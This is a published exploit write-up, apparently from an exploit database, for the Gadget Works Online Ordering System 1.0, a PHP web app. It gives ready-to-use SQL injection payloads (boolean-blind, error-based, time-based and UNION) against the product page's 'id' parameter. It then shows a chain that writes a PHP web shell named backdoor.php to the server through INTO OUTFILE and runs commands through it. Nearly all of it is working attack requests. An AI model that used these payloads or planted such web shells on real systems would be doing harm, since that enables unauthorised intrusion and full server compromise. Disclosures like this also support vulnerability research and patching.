Share
## https://sploitus.com/exploit?id=PACKETSTORM:162432
# Exploit Title: Gadget works online ordering system - Authentication Bypass SQLi  
# Date: 03/05/2021  
# Exploit Author: Richard Jones  
# Vendor Homepage: https://www.sourcecodester.com/php/13093/gadget-works-online-ordering-system-phpmysqli.html  
# Version: 1.0  
# Tested on: Windows 10 build 19041 + xampp 3.2.4  
  
SQL Injection details:   
  
Endpoint:  
*replace IP with the website IP  
  
http://IP/philosophy/index.php?q=single-item&id=1  
  
Parameter: id (GET)  
Type: boolean-based blind  
Title: Boolean-based blind - Parameter replace (original value)  
Payload: q=single-item&id=(SELECT (CASE WHEN (5628=5628) THEN 1 ELSE (SELECT 9686 UNION SELECT 8857) END))  
  
Type: error-based  
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
Payload: q=single-item&id=1 OR (SELECT 3320 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(3320=3320,1))),0x716a706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: q=single-item&id=1 AND (SELECT 2585 FROM (SELECT(SLEEP(5)))BrmF)  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 20 columns  
Payload: q=single-item&id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71787a7671,0x67664845794943545a51517775675672466965636572474d435a48727a58646750687253474d766d,0x716a706271),NULL-- -  
  
  
SQL Injection to RCE  
  
*replace IP with websites IP  
  
http://IP/philosophy/index.php?q=single-item&id=1+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,"<%3fphp+echo+shell_exec($_GET['cmd'])%3b%3f>",NULL+into+outfile+"C%3a\\xampp\\htdocs\\backdoor.php"--+-  
  
  
RCE execution point:   
http://IP/backdoor.php?cmd=whoami